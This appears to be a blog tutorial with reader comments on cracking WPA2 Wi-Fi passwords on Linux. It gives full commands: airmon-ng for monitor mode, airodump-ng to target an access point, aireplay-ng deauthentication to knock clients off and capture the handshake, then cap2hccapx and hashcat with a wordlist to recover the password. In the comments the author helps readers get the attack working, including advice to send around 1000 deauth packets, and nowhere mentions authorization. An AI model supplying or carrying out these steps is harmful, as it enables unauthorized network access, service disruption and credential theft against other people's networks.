Crack-WIFI-WPA2 in Linux!
Prerequirments :
- Aircrack-ng :
sudo apt install aircrack-ng
Lets capture the flag (I mean Handshake):
Open terminal.....
Terminal-1:
- Detect your wireless network interface :
ifconfig
if coudn't find command then try :
/sbin/ifconfig
lets take wlp3s0 as the wireless interface
- Start monitor mode : ```
sudo airmon-ng start wlp3s0
![Enable Monitor mode](https://dev-to-uploads.s3.amazonaws.com/i/2rkd5dtkq34r7eq3uamt.png)
3. capture traffic :
sudo airodump-ng wlp3s0mon
![Monitoring](https://dev-to-uploads.s3.amazonaws.com/i/jxh9qpoqjos40kdltxlx.png)
#### Terminal-2:
4. select target and focus on one AP on channel:
sudo airodump-ng --bssid xx.xx.xx.xx.xx.xx -c y --write filename wlp3s0mon
- **xx.xx.xx.xx.xx.xx** defines : **AP BSSID** -> 00.11.22.33.44.55 (suppose)
- **y** defines : **AP channel** -> 10 (suppose)
- **filename** is the file name where the **handshake** will captute and make some other stuffs .
![Monitong target](https://dev-to-uploads.s3.amazonaws.com/i/8zjk8plcyl6z29fnryhv.png)
#### Terminal-3:
5. Send traffic to the channel :
sudo aireplay-ng --deauth y -a xx.xx.xx.xx.xx.xx wlp3s0mon
- ammoun of **traffic**-> y
![Deauth](https://dev-to-uploads.s3.amazonaws.com/i/2zt6a5hmp46fskpmgefq.png)
6. Capture handshake : it will be shown in the monitor if captured ! at **Terminal-2**.
7. Now you got the handshake .**(terminal-2)**
8. Stop the process of terminal-2 : `ctrl+c`
### Now Lets crack the password !
**There will be a WPAcrack-01.cap file in your home directory**
1. convert cap file into hccapx file : https://www.onlinehashcrack.com/tools-cap-to-hccapx-converter.php
or
1. use **[cap2hccapx.c](https://github.com/hashcat/hashcat-utils/blob/master/src/cap2hccapx.c)** file to convert the **cap** file to **hccapx** file
gcc cap2hccapx.c -o cap2hccapx && ./cap2hccapx file.cap file.hccapx
![cap to hccapx](https://dev-to-uploads.s3.amazonaws.com/i/uw7skeg2i1er7oby9u5w.png)
2. Crack password using **hashcat** :
- **Install hashcat :**`sudo apt install hashcat`
- check is everything oky ? : `hashcat -I` **to use hashcat you need gpu**
- crack password :
sudo hashcat -m 2500 wpacrack.hccapx dictionary.txt
- dictionary.txt -> word list (suppose)
- wpacrack.hccapx is the handshake file
![hashcat](https://dev-to-uploads.s3.amazonaws.com/i/fgckhzgx1q9jew9682se.png)
![Status](https://dev-to-uploads.s3.amazonaws.com/i/8x1esdec8o18mkkeb8m6.png)
Then you will get the password.
![password](https://dev-to-uploads.s3.amazonaws.com/i/gju9qq3yvasq1lsuk40v.png)
[Here is the git repo you can find **cap2hccapx.c** ](https://github.com/jspw/Crack-WIFI-WPA2)
Top comments (27)
airodump-ng does not discover any wifi networks, though they all are in very close proximity and good strength, they are visible on my phone but airodump-ng shows this and stays like this forever, without any change
sometimes it cant capture the handshake and there can be may reasons for that like your wirelesses adapter is not capable of capturing it, weak signal bla bla.....
Try to stay close to the targeted device.
Yes i searched about it a lot on the internet and finally got to know that there is some issue with the QUALCOM ATHEROS Q933... adapter which comes in a lot of devicesand the only possible solution for this is to use an external Wi-Fi card
yup
When i follow these steps at some point i get this error:
sudo airodump-ng wlp3s0mon
nl80211 not found.
Interface wlp3s0mon:
ioctl(SIOCGIFINDEX) failed: No such device
Failed initializing wireless card(s): wlp3s0mon
What am i doing wrong or what am i missing?
Also in the step before i get the message:
Requested device "wlp3s0" does not exist.
can you show me the output of
ifconfig
ifconfig
enp0s3: flags=4163 mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::ceb7:156a:789d:6d60 prefixlen 64 scopeid 0x20
ether 08:00:27:18:68:bf txqueuelen 1000 (Ethernet)
RX packets 585 bytes 256028 (256.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 640 bytes 83216 (83.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 320 bytes 31490 (31.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 320 bytes 31490 (31.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
can you give me the screenshot? text are confusing here!
here you go
imgur.com/a/unY5Tqr again here you go haha
image is resolution too bad... and are you sure you have a wireless interface? and it is monitor mode supported?
hmm i'm sorry cant do anything resolution wise. And yes i have a wireless connection and a wired connection in my pc. Dont know for sure if it is monitor supported but i believe it is. it's build in into an aorus master x570 mobo
look in this ss my wifi interface is wlp3s0.
Yeah i saw. I am getting a feeling that Ubuntu doesnt pick up my wireless connection at all. Because even if i check in the settings and network it only shows a wired. The dongle is multi purpose also for Bluetooth and there it say plug in a dongle to use Bluetooth
using
ifconfig
you can find the wireless interface name. Then usesudo airodump-ng interface_name
. I have usedwlp3s0
because it was my wireless interface. So you have to use yours here.where are locate a wordlist?
where a wordlist from?
you can make your own word lists or you can download from internet.
There are a lot of word lists made by the hackers.
One of the popular word list is rock you.txt you can google it.
thank you sir
your most welcome..
I do not understand
Exactly what didnt you understan? 😕
whenever i try to follow steps my wifi turns itself off. is it normal ?
"sudo airodump-ng --bssid xx.xx.xx.xx.xx.xx -c y --write filename wlp3s0mon" when i try to execute , terminal says "airodump-ng help"
why does it do that. Thanks
where can I view the password after cracking the password. when I type "hashcat -m 2500 myfilename.hccapx rockyou.txt --show" nothing happen. Thanks
When you are using a wordlist to crack the password using
sudo hashcat -m 2500 wpacrack.hccapx dictionary.txt
you will find the password in terminal if your wordlist have the password.This is all I'm getting: ibb.co/JpvkHFK
What does it mean?
you are sending Only 4 deauth...
try to send more like 1000 so that the router will disconnect the commected divices and then these devices will try to connect with the router and your montioring terminal will catch the handshake between router and the connected device.
GPU is mandatory for using hashcat as you have said then this should have been put in Prerequirements section. After following most of the steps, now I am stuck at hashcat